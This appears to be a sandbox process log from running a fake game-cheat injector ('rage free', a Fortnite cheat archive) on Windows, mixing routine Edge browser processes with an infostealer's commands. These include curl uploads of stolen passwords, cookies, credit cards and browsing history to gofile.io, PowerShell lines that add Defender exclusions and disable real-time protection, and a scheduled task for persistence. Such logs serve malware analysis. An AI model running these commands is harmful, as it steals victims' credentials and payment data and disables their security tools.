"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\rage free\Injector.exe

"C:\Users\Admin\Desktop\rage free\Injector.exe" "C:\Users\Admin\Desktop\rage free\test.dll"

C:\Users\Admin\AppData\Roaming\injector.exe

"C:\Users\Admin\AppData\Roaming\injector.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Users\Admin\AppData\Roaming\Nothere.exe

"C:\Users\Admin\AppData\Roaming\Nothere.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c color 9

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nothere.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nothere.exe'

C:\Windows\SoftwareDistribution\Download\qOTtu.exe

"C:\Windows\SoftwareDistribution\Download\qOTtu.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windowshalper(legit).exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windowshalper(legit)" /tr "C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\Desktop\rage free\Injector.exe

"C:\Users\Admin\Desktop\rage free\Injector.exe"

C:\Users\Admin\AppData\Roaming\injector.exe

"C:\Users\Admin\AppData\Roaming\injector.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Users\Admin\AppData\Roaming\Nothere.exe

"C:\Users\Admin\AppData\Roaming\Nothere.exe"

C:\Users\Admin\AppData\Roaming\creal.exe

"C:\Users\Admin\AppData\Roaming\creal.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c color 9

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile

C:\Windows\SoftwareDistribution\Download\q8q5y.exe

"C:\Windows\SoftwareDistribution\Download\q8q5y.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store2.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store2.gofile.io/uploadFile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5480 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5484 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1744 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Fortnite-external-updated-main\Fortnite-external-updated-main\VANTA.rar"

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:8

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\vt.exe'

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"

